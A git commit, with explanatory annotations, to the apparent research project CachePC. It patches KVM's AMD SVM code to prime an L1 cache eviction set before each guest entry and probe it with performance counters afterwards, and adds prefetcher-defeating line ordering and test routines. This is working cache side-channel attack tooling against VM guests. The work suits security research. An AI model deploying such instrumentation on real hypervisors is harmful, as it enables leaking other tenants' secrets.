commit 476f6c892d90e66fbd17ba616b82b000a990f63e
parent 0f3b9caf389b486541614836bf180b64544615cb
Author: Louis Burda <quent.burda@gmail.com>
Date: Sat, 13 Aug 2022 20:05:27 +0200
Add cache line ordering that prevents hardware prefetching, fix CachePC count reads
Diffstat:
5 files changed, 61 insertions(+), 75 deletions(-)
diff --git a/kmod/cache_types.h b/kmod/cache_types.h
@@ -22,9 +22,8 @@
#define IS_LAST(flags) GET_BIT(flags, 1)
#define IS_CACHE_GROUP_INIT(flags) GET_BIT(flags, 2)
-// Offset of the next and prev field in the cacheline struct
-#define CL_NEXT_OFFSET 0
-#define CL_PREV_OFFSET 8
+#define CL_NEXT_OFFSET offsetof(struct cacheline, next)
+#define CL_PREV_OFFSET offsetof(struct cacheline, prev)
typedef enum cache_level cache_level;
typedef enum addressing_type addressing_type;
@@ -53,12 +52,15 @@ struct cacheline {
cacheline *next;
cacheline *prev;
- uint16_t cache_set;
- uint16_t flags;
+ uint32_t cache_set;
+ uint32_t cache_line;
+ uint32_t flags;
// Unused padding to fill cache line
uint64_t count;
- char padding[32];
+
+ char padding[24];
};
static_assert(sizeof(struct cacheline) == CACHELINE_SIZE, "Bad cache line struct size");
+static_assert(CL_NEXT_OFFSET == 0 && CL_PREV_OFFSET == 8);
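
The offsetof-based constants plus the new static_assert pin down an invariant the probe code in kmod/cachepc.h depends on: next at offset 0 and prev at offset 8, since the walk dereferences them through fixed displacements in inline asm. A standalone sketch of the layout and its checks (the 64-byte CACHELINE_SIZE and the implicit 4-byte hole before count are assumptions about the target machine and ABI):

#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define CACHELINE_SIZE 64	/* assumed L1 line size */

struct cacheline {
	struct cacheline *next;	/* offset 0: walked via 0(%reg) */
	struct cacheline *prev;	/* offset 8: walked via 8(%reg) */
	uint32_t cache_set;
	uint32_t cache_line;
	uint32_t flags;
	/* 4 bytes of implicit padding align count to 8 */
	uint64_t count;
	char padding[24];	/* 8+8+12+4+8+24 = 64 */
};

static_assert(offsetof(struct cacheline, next) == 0, "probe asm relies on this");
static_assert(offsetof(struct cacheline, prev) == 8, "probe asm relies on this");
static_assert(sizeof(struct cacheline) == CACHELINE_SIZE, "one struct per line");
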
diff --git a/kmod/cachepc.c b/kmod/cachepc.c
@@ -46,8 +46,6 @@ cache_ctx *
cachepc_get_ctx(cache_level cache_level)
{
cache_ctx *ctx;
-
- // printk(KERN_WARNING "CachePC: Getting ctx..\n");
ctx = kzalloc(sizeof(cache_ctx), GFP_KERNEL);
BUG_ON(ctx == NULL);
@@ -72,8 +70,6 @@ cachepc_get_ctx(cache_level cache_level)
ctx->set_size = CACHELINE_SIZE * ctx->associativity;
ctx->cache_size = ctx->sets * ctx->set_size;
- // printk(KERN_WARNING "CachePC: Getting ctx done\n");
-
return ctx;
}
@@ -395,6 +391,7 @@ allocate_cache_ds(cache_ctx *ctx)
for (i = 0; i < ctx->nr_of_cachelines; ++i) {
cl_ptr_arr[i] = cl_arr + i;
cl_ptr_arr[i]->cache_set = get_virt_cache_set(ctx, cl_ptr_arr[i]);
+ cl_ptr_arr[i]->cache_line = i / ctx->sets;
}
return cl_ptr_arr;
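
The new cache_line field tags each eviction-set line with its way group. Because the backing array is filled set-major, the first ctx->sets pointers touch every set once (way group 0), the next ctx->sets touch them a second time, and so on. A small illustration of the indexing, assuming a 64-set, 8-way L1 and a set-aligned allocation (so the virtual set index reduces to i % sets):

#include <stdint.h>
#include <stdio.h>

int main(void)
{
	const uint32_t sets = 64, ways = 8;	/* assumed L1 geometry */
	uint32_t i;

	for (i = 0; i < sets * ways; i++) {
		/* set-major fill: every set appears once per way group */
		if (i % sets < 2)	/* print the first two sets of each pass */
			printf("i=%3u -> set %u, way group %u\n",
			       i, i % sets, i / sets);
	}
	return 0;
}
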
diff --git a/kmod/cachepc.h b/kmod/cachepc.h
@@ -49,13 +49,12 @@ cachepc_prime(cacheline *head)
{
cacheline *curr_cl;
- cachepc_cpuid();
+ //cachepc_cpuid();
curr_cl = head;
do {
curr_cl = curr_cl->next;
- cachepc_mfence();
} while(curr_cl != head);
- cachepc_cpuid();
+ //cachepc_cpuid();
return curr_cl->prev;
}
@@ -79,13 +78,12 @@ cachepc_prime_rev(cacheline *head)
{
cacheline *curr_cl;
- cachepc_cpuid();
+ //cachepc_cpuid();
curr_cl = head;
do {
curr_cl = curr_cl->prev;
- cachepc_mfence();
} while(curr_cl != head);
- cachepc_cpuid();
+ //cachepc_cpuid();
return curr_cl->prev;
}
@@ -96,16 +94,14 @@ cachepc_probe(cacheline *start_cl)
uint64_t pre, post;
cacheline *next_cl;
cacheline *curr_cl;
- volatile register uint64_t i asm("r12");
curr_cl = start_cl;
do {
pre = cachepc_read_pmc(0);
- pre += cachepc_read_pmc(1);
cachepc_mfence();
- cachepc_cpuid();
+ //cachepc_cpuid();
asm volatile(
"mov 8(%[curr_cl]), %%rax \n\t" // +8
@@ -123,13 +119,12 @@ cachepc_probe(cacheline *start_cl)
);
cachepc_mfence();
- cachepc_cpuid();
+ //cachepc_cpuid();
post = cachepc_read_pmc(0);
- post += cachepc_read_pmc(1);
cachepc_mfence();
- cachepc_cpuid();
+ //cachepc_cpuid();
/* works across size boundary */
curr_cl->count = post - pre;
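
Each probe step now brackets a single dependent load with one read of PMC 0 on either side; the second counter and the cpuid serialization were dropped, leaving only mfence for ordering (cpuid's heavier serialization evidently distorted the per-line counts). A self-contained sketch of one such step; read_pmc and probe_one are stand-in names, and counter 0 is assumed to be programmed for the L2 data cache hit/miss event used elsewhere in this commit:

#include <stdint.h>

/* minimal stand-in for the module's struct (see kmod/cache_types.h) */
struct cacheline { struct cacheline *next, *prev;
                   uint32_t cache_set, cache_line, flags;
                   uint64_t count; char padding[24]; };

static inline uint64_t read_pmc(uint32_t n)
{
	uint32_t lo, hi;
	asm volatile("rdpmc" : "=a"(lo), "=d"(hi) : "c"(n));
	return ((uint64_t)hi << 32) | lo;
}

/* one probe step: bracket a single dependent load with PMC reads */
static void probe_one(struct cacheline *curr_cl)
{
	uint64_t pre, post;

	pre = read_pmc(0);	/* counter 0: L2 data cache hit/miss */
	asm volatile("mfence" ::: "memory");

	/* touch the line through its prev field (offset 8), as the asm does */
	asm volatile("mov 8(%0), %%rax" :: "r"(curr_cl) : "rax", "memory");

	asm volatile("mfence" ::: "memory");
	post = read_pmc(0);
	asm volatile("mfence" ::: "memory");

	curr_cl->count = post - pre;	/* per-line miss count, read out later */
}
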
diff --git a/kmod/util.c b/kmod/util.c
@@ -20,16 +20,22 @@ prng_bytes(uint8_t *dst, size_t size)
void
random_perm(uint32_t *arr, uint32_t arr_len)
{
- uint32_t i, idx, tmp;
+ uint32_t i, mid; // idx, tmp;
- for (i = arr_len - 1; i > 0; --i) {
- prng_bytes((void*)&idx, 4);
- idx = idx % i;
-
- tmp = arr[idx];
- arr[idx] = arr[i];
- arr[i] = tmp;
+ /* defeat the stream prefetcher by avoiding a consistent access direction */
+ mid = arr_len / 2;
+ for (i = 0; i < arr_len; i++) {
+ arr[i] = mid + (i % 2 ? -1 : 1) * ((i + 1) / 2);
}
+
+ // for (i = arr_len - 1; i > 0; --i) {
+ // prng_bytes((void*)&idx, 4);
+ // idx = idx % i;
+
+ // tmp = arr[idx];
+ // arr[idx] = arr[i];
+ // arr[i] = tmp;
+ // }
}
void
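
Despite its name, random_perm no longer randomizes: it emits a fixed zig-zag around the array midpoint, so consecutive values alternate between the lower and upper half and never form the monotonic stride a stream prefetcher locks onto. For arr_len = 8 (mid = 4) the order is 4, 3, 5, 2, 6, 1, 7, 0, which is still a permutation of 0..7. A hypothetical userspace check of that property:

#include <stdint.h>
#include <stdio.h>

int main(void)
{
	uint32_t arr[8], i, mid, seen = 0;
	const uint32_t arr_len = 8;

	mid = arr_len / 2;
	for (i = 0; i < arr_len; i++)
		arr[i] = mid + (i % 2 ? -1 : 1) * ((i + 1) / 2);

	for (i = 0; i < arr_len; i++) {
		printf("%u ", arr[i]);
		seen |= 1u << arr[i];
	}
	printf("\n%s\n", seen == 0xff ? "permutation ok" : "BROKEN");
	return 0;
}
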
diff --git a/patch.diff b/patch.diff
@@ -32,7 +32,7 @@ index b804444e16d4..17167ccfca22 100644
obj-$(CONFIG_KVM) += kvm.o
obj-$(CONFIG_KVM_INTEL) += kvm-intel.o
diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
-index 7b3cfbe8f7e3..71697d08e9e4 100644
+index 7b3cfbe8f7e3..16dfd9b2938e 100644
--- a/arch/x86/kvm/svm/svm.c
+++ b/arch/x86/kvm/svm/svm.c
@@ -2,6 +2,8 @@
@@ -44,31 +44,29 @@ index 7b3cfbe8f7e3..71697d08e9e4 100644
#include "irq.h"
#include "mmu.h"
#include "kvm_cache_regs.h"
-@@ -3785,8 +3787,18 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu,
+@@ -3785,8 +3787,13 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu,
static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu)
{
- struct vcpu_svm *svm = to_svm(vcpu);
-+ static struct cache_ctx *ctx = NULL;
-+ static struct cacheline *ds = NULL;
-+ static struct cacheline *head = NULL;
-+ static int run_index = 0;
++ struct cacheline *head;
+ struct vcpu_svm *svm;
++ int cpu;
+
+ printk(KERN_WARNING "CachePC: svm_vcpu_enter_exit()\n");
-+
-+ if (!ctx) ctx = cachepc_get_ctx(L1);
-+ if (!ds) ds = cachepc_prepare_ds(ctx);
+ svm = to_svm(vcpu);
svm->vmcb->save.rax = vcpu->arch.regs[VCPU_REGS_RAX];
svm->vmcb->save.rsp = vcpu->arch.regs[VCPU_REGS_RSP];
svm->vmcb->save.rip = vcpu->arch.regs[VCPU_REGS_RIP];
-@@ -3835,8 +3847,14 @@ static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu)
+@@ -3835,8 +3842,19 @@ static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu)
*/
x86_spec_ctrl_set_guest(svm->spec_ctrl, svm->virt_spec_ctrl);
-+ head = cachepc_prime(ds);
++ cpu = get_cpu();
++ WARN_ON(cpu != 2);
++
++ head = cachepc_prime(cachepc_ds);
+
svm_vcpu_enter_exit(vcpu, svm);
@@ -76,20 +74,13 @@ index 7b3cfbe8f7e3..71697d08e9e4 100644
+ //cachepc_print_msrmts(head);
+ cachepc_save_msrmts(head);
+
++ put_cpu();
++
/*
* We do not use IBRS in the kernel. If this vCPU has used the
* SPEC_CTRL MSR it may have left it on; save the value and
-@@ -3912,6 +3930,8 @@ static __no_kcsan fastpath_t svm_vcpu_run(struct kvm_vcpu *vcpu)
- if (is_guest_mode(vcpu))
- return EXIT_FASTPATH_NONE;
-
-+ run_index += 1;
-+
- return svm_exit_handlers_fastpath(vcpu);
- }
-
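
Net effect of the svm.c changes: the lazy per-call setup (static ctx/ds) and the run_index counter are gone in favor of the globals initialized at module load, and the measurement is pinned to the CPU whose counters were programmed (the WARN_ON documents that only core 2 is set up). Paraphrasing the patched svm_vcpu_run flow (a sketch, not verbatim kernel code; the cachepc_probe call presumably sits in the unchanged context of this hunk):

/* sketch of the measurement bracket around guest entry */
cpu = get_cpu();			/* pin task, disable preemption */
WARN_ON(cpu != 2);			/* PMCs were programmed on core 2 only */

head = cachepc_prime(cachepc_ds);	/* fill L1 with the eviction set */
svm_vcpu_enter_exit(vcpu, svm);		/* run guest; it evicts our lines */
cachepc_probe(head);			/* per-line PMC deltas -> cl->count */
cachepc_save_msrmts(head);		/* export counts for userspace */

put_cpu();
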
diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
-index 2541a17ff1c4..a84a99f4b182 100644
+index 2541a17ff1c4..8c46d509bd13 100644
--- a/virt/kvm/kvm_main.c
+++ b/virt/kvm/kvm_main.c
@@ -51,6 +51,9 @@
@@ -130,7 +121,7 @@ index 2541a17ff1c4..a84a99f4b182 100644
__visible bool kvm_rebooting;
EXPORT_SYMBOL_GPL(kvm_rebooting);
-@@ -4765,12 +4782,245 @@ static void check_processor_compat(void *data)
+@@ -4765,12 +4782,240 @@ static void check_processor_compat(void *data)
*c->ret = kvm_arch_check_processor_compat(c->opaque);
}
@@ -189,10 +180,15 @@ index 2541a17ff1c4..a84a99f4b182 100644
+ uint32_t *user;
+
+ /* l2 prefetches, hit or miss */
-+ cachepc_init_pmc(0, 0x60, 0x01);
++ // cachepc_init_pmc(0, 0x60, 0x01);
++
++ /* l2 data cache, hit or miss */
++ cachepc_init_pmc(0, 0x64, 0xD8);
+
+ user = p;
+
++ WARN_ON(user && *user >= L1_SETS);
++ if (user && *user >= L1_SETS) return;
+ ptr = cachepc_prepare_victim(cachepc_ctx, user ? *user : 48);
+
+ cachepc_mfence();
@@ -210,16 +206,6 @@ index 2541a17ff1c4..a84a99f4b182 100644
+
+ pre = cachepc_read_pmc(0);
+
-+ //cachepc_mfence();
-+ //cachepc_cpuid();
-+
-+ //pre += cachepc_read_pmc(1);
-+
-+ //cachepc_mfence();
-+ //cachepc_cpuid();
-+
-+ //pre += cachepc_read_pmc(2);
-+
+ cachepc_mfence();
+ cachepc_cpuid();
+
@@ -235,16 +221,6 @@ index 2541a17ff1c4..a84a99f4b182 100644
+
+ post = cachepc_read_pmc(0);
+
-+ //cachepc_mfence();
-+ //cachepc_cpuid();
-+
-+ //post += cachepc_read_pmc(1);
-+
-+ //cachepc_mfence();
-+ //cachepc_cpuid();
-+
-+ //post += cachepc_read_pmc(2);
-+
+ cachepc_mfence();
+ cachepc_cpuid();
+
@@ -267,7 +243,10 @@ index 2541a17ff1c4..a84a99f4b182 100644
+ /* l2 data cache, hit or miss */
+ cachepc_init_pmc(0, 0x64, 0xD8);
+
++ WARN_ON(user && *user >= L1_SETS);
++ if (user && *user >= L1_SETS) return;
+ ptr = cachepc_prepare_victim(cachepc_ctx, user ? *user : 48);
++
+ head = cachepc_prime(cachepc_ds);
+ cachepc_victim(ptr);
+ cachepc_probe(head);
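
Both tests now validate the user-supplied set index against L1_SETS before building a victim for it (defaulting to set 48). After prime, victim access, and probe, only the victim's set should show a miss. A hypothetical check that could follow the probe above, reusing head and user from this function:

cacheline *cl = head;
int evicted = 0;
do {
	if (cl->count > 0) {
		evicted += 1;
		WARN_ON(cl->cache_set != (user ? *user : 48));
	}
	cl = cl->next;
} while (cl != head);
WARN_ON(evicted == 0);	/* the victim access must evict something */
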
@@ -281,6 +260,7 @@ index 2541a17ff1c4..a84a99f4b182 100644
+void
+kvm_cachepc_init(void *p)
+{
++ cacheline *cl, *head;
+ int cpu;
+
+ local_irq_disable();
@@ -292,6 +272,12 @@ index 2541a17ff1c4..a84a99f4b182 100644
+ cachepc_ctx = cachepc_get_ctx(L1);
+ cachepc_ds = cachepc_prepare_ds(cachepc_ctx);
+
++ head = cl = cachepc_ds;
++ do {
++ cl = cl->next;
++ printk(KERN_WARNING "%i:%i\n", cl->cache_set, cl->cache_line);
++ } while (cl != head);
++
+ kvm_cachepc_single_access_test(p);
+ kvm_cachepc_single_eviction_test(p);
+
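
The debug walk above prints every line of the eviction set as set:way-group, which lets the new ordering be eyeballed against the prefetcher-defeating zig-zag. A stricter, hypothetical variant would assert that each (cache_set, cache_line) pair occurs exactly once (64 sets x 8 ways assumed, reusing cl and head):

/* hypothetical stricter check of the chain built by cachepc_prepare_ds */
static uint8_t seen[64][8];
head = cl = cachepc_ds;
do {
	cl = cl->next;
	WARN_ON(seen[cl->cache_set][cl->cache_line]++ != 0);
} while (cl != head);
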
@@ -378,7 +364,7 @@ index 2541a17ff1c4..a84a99f4b182 100644
r = kvm_arch_init(opaque);
if (r)
-@@ -4848,6 +5098,21 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align,
+@@ -4848,6 +5093,21 @@ int kvm_init(void *opaque, unsigned vcpu_size, unsigned vcpu_align,
r = kvm_vfio_ops_init();
WARN_ON(r);
@@ -400,7 +386,7 @@ index 2541a17ff1c4..a84a99f4b182 100644
return 0;
out_unreg:
-@@ -4872,6 +5137,12 @@ EXPORT_SYMBOL_GPL(kvm_init);
+@@ -4872,6 +5132,12 @@ EXPORT_SYMBOL_GPL(kvm_init);
void kvm_exit(void)
{